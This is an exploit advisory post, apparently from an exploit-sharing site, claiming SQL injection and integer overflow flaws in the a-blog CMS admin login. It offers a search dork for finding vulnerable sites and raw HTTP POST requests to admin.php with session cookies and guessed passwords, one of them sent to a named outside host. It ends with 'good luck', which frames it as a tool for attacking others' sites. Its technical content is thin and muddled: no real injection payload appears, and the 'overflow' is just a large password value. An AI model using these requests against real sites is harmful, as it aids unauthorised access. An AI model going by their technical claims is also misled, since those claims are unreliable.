facebook facebook twitter rss

a-blog SQL Injection AND Integer Overflow

Author: wlhaan hacker , Published: 04-11-2014
_____________________________________________________
a-blog) SQL Injection AND Integer Overflow)

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : http://www.a-blog.jp// #
# [+] team wlhaan Hacker #
# [+] Dork : Powered by a-blog
# [+]Risk
# [+]High
#####################################################

The exploit :

http://localhost/PATH/admin.php

GET http://localhost/admin.php HTTP/1.0

POST /admin.php HTTP/1.1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: HOST
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; /1.0
Cookie: sid=c72458bf909c8b8b85cc9b69f490719c
Cookie2: $Version=1

sid=c72458bf909c8b8b85cc9b69f490719c-0&id=1&passwd=admin&cookie=on&action=login&Submit=%C2%83%C2%8D%C2%83O%C2%83C%C2%83%C2%93


#####################################################
Integer Overflow
_________________

HTTP/1.1 200 OK
Date: Fri, 31 Oct 2014 19:36:17 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Transfer-Encoding: chunked
Connection: Keep-Alive
___________________________

POST /admin.php HTTP/1.1
Content-Length: 128
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: d0u0b.net
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; /1.0
Cookie: sid=c72458bf909c8b8b85cc9b69f490719c
Cookie2: $Version=1

POST /admin.php [sid=c72458bf909c8b8b85cc9b69f490719c id=1 passwd=4294967295 cookie=on action=login Submit=? ?O?C?? ]

#####################################################

and good luck :D

Thanks to : shooq hacker ..


Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################################################

Like us on Facebook :